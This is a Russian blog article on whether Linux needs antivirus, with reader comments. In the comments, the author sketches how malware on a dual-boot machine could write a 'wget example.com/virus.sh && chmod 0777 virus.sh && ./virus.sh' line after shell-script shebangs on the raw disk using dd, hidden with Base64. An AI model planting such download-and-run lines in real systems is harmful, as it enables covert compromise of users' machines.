Зачем линуксоиду антивирус?
13 May, 2015 pomodor 15
Многие наивно полагают, что Linux настолько безопасен, что вирусы в нем попросту не выживают, поэтому и антивирус устанавливать незачем. Однако, можно назвать минимум 4 причины антивирус всё же установить.
Зачем в Linux Антивирус?
- Да, работающих вирусов и троянов для Linux не так много, как для Windows. И способность вирусов распространяться в Linux-системах весьма ограничена. Но уничтожить содержимое домашней директории пользователя вирусу вполне по силам. Следовательно, дополнительная защита будет весьма кстати.
- Хотя установка программ из репозиториев значительно снижает риск подхватить заразу, остаются другие пути заражения. Например, вы можете принести троян на флешке, которую ранее подключали к компьютеру в общественном месте.
- Если у вас установлена второй системой ОС Windows, тамошние вирусы могут получить доступ к Linux-разделу и инжектировать свой вредоносный код в пользовательские и даже системные файлы.
- Если у вас на компьютере запущены сервисы вроде Samba, вирусы легко могут проникнуть на диск естественным путем и дожидаться, когда вы их из любопытства запустите. В общем, и тут антивирус не помешает.
Статья является адаптированным переводом креатива «Why would I use Antivirus in a Linux system»? Мнение редакции Либератума может не совпадать (и не совпадает) с точкой зрения автора оригинальной статьи. В частности, редакция полным составом уверена в том, что правильное выстраивание политики безопасности дает намного более серьезный результат, чем использование антивирусов, эффективность которых вызывает сомнение.
field_vote:
Главная тема:
Программное обеспечение:
Комментарии
Platon
13 мая, 2015 - 07:27
rkhunter и chkrootkit — для мониторинга внутренних угроз
clamtk — для проверки внешних носителей (флешек)
остальные функции успешно выполняет сетевой экран iptables
проактивные АВ в Linux - 5-ое колясо
webhive
13 мая, 2015 - 12:48
Теоретически конечно да, практически — это какая-то фантастика. Это вирус должен получается как минимум иметь с своём теле драйвера для всех (ну или как минимум наиболее популярных) файловых систем. Плюс уметь инжектироваться в elf.
Это кстати больше из раздела мифов. Нормально они распространяются. В особенности трояны. Правда и найти их существенно легче т.к. мест куда троян может сохраниться не так много.
Это как-то больше на страшилку похоже.
В общем в целом согласен с мнением редакции.
Texnoline
13 мая, 2015 - 17:28
а можно показать хоть один реальный троян для дистрибутива Linux, честно хочу увидить в реальности!?
А то все только, как концепты и только...типа возможно и будет или можно подцепить и чего-то там заразить?:)
webhive
13 мая, 2015 - 18:21
Сталкивался лично. Код к сожалению не сохранил — но помню путь каким он попадал в систему. На сервере работал wordpress — соответственно установлен LAMP. Сам троян появлялся в папке /tmp — там появлялись исходники. Команда на компиляцию прописывалась в кронтаб. Как-то так — давно было дело. Собственно сам по себе троян был просто запускалкой php. Такой типа мини сервер — просто слушал и ждал команды. Т.е. локальный доступ в систему с правами вебсервера у него типа уже был. Дальше уже использовались локальные уязвимости.
webhive
13 мая, 2015 - 18:27
Да — вспомнил ещё — когда права привели в порядок и у него не стало возможности записываться на диск я помню последний раз поймал его (ну в смысле исходный код) в одном из подкаталогов /dev/, что просто вынесло мне мозг. Скомпилироваться он уже не мог, а вот тело всё равно ухитрялся записать. PHP стоял без секьюрити патчей т.е. при их установке резко падала производительность и хозяин сервера был крайне недоволен.
webhive
13 мая, 2015 - 18:35
Да и вот кстати легко гуглится http://habrahabr.ru/post/248933/.
Используется кстати трюк с кронтабом который я описал в другой ветке.
pomodor
13 мая, 2015 - 20:18
Нихрена подобного! Вирус может читать сырые данные, искать в потоке сигнатуры (например, #!/bin/bash) и прописывать за ней команду на загрузку своего кода (например, wget example.com/virus.sh && chmod 0777 virus.sh && ./virus.sh). Для этого драйвер не нужен. И когда линуксоид загрузится в Linux, инфицирование практически гарантировано.
Единственное, что немного сдерживает такую угрозу — необходимость получить низкоуровневой доступ к диску. Но какой виндузятник не тыкает по инерции на кнопку Yes, когда у него Вантуз чем-нибудь на тему безопасности интересуется?!
webhive
13 мая, 2015 - 20:23
Мммда — кстати любопытно
pomodor
13 мая, 2015 - 20:32
Ничего любопытного. :) А из Linux можно легко читать данные на Windows-разделах, искать в них подстроки, дописывать свои данные. И без всяких драйверов, только с помощью dd и cat. Создайте в Вантузе текстовой файл, поместите в него какую-нибудь уникальную строку (например, сумму MD5), а потом найдите ее в Linux, даже не монтируя Windows-раздел:
cat /dev/sda1 | grep подстрока
Ну а дописать свой код можно с помощью dd и опции offset.
Драйвер понадобится только для зашифрованных файловых систем.
webhive
13 мая, 2015 - 22:51
Но как я понимаю есть риск превысить размер блока на файловой системе. Тогда при загрузке файл будет испорчен. Правда его надо ещё превысить. В принципе подсадить заразу вполне хватит.
pomodor
13 мая, 2015 - 23:01
Файл не будет испорчен. Просто ОС не увидит данные за границами, указанными в таблице размещения файлов. Да и риск выйти за границы существует только тогда, когда дописывать что-то предполагается в конец файла, тогда как в моем примере предлагается переписывать данные сразу за #!/bin/sh, то есть в начало.
webhive
13 мая, 2015 - 23:07
Ну я имею в виду если размер кода будет больше чем размер блока, то он будет нерабочий — испорченный. Но ситуация конечно маловероятная.
pomodor
13 мая, 2015 - 23:20
Нет никакого смысла помещать вредоносный код целиком. Достаточно вставить короткую строку загрузки трояна из интернета. Да еще в Base64 зашифрованную, чтобы большинство убунтоидов ничего не заподозрило.
Комментировать